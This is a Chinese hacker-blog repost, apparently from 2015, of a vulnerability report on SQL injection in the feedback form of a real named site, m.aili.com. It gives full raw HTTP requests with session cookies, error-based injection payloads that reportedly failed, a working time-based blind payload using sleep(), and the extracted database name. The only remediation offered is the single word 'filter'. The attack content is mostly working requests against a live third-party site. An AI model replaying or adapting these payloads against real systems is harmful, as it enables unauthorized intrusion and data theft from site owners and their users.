记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

爱丽网某站mysql注入

2015-04-01 02:15

网站:m.aili.com


info 和emil都存在注入,两个点结合才能利用

首先是报错注入


POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 40
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=



HTTP/1.1 200 OK
Date: Fri, 20 Feb 2015 23:50:36 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 shhl147:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1564

System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','')<!DOCTYPE html>
<html>
<head>



两个地方结合闭合括号才能利用,目测是二次注入


POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 43
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=a

HTTP/1.1 200 OK
Date: Fri, 27 Feb 2015 13:24:21 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 jsycdx94:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1566

System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','a\')<!DOCTYPE html>
<html>
<head>





构造如下报错注入不能成功


POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))%23


这个payload也不行
(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a)





暂时只能盲注


POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,NULL%2bsleep(3))%23





出点数据吧:


database()=neqcmsK*

解决方案:

过滤

知识来源: www.2cto.com/Article/201503/386756.html

阅读:99103 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“爱丽网某站mysql注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云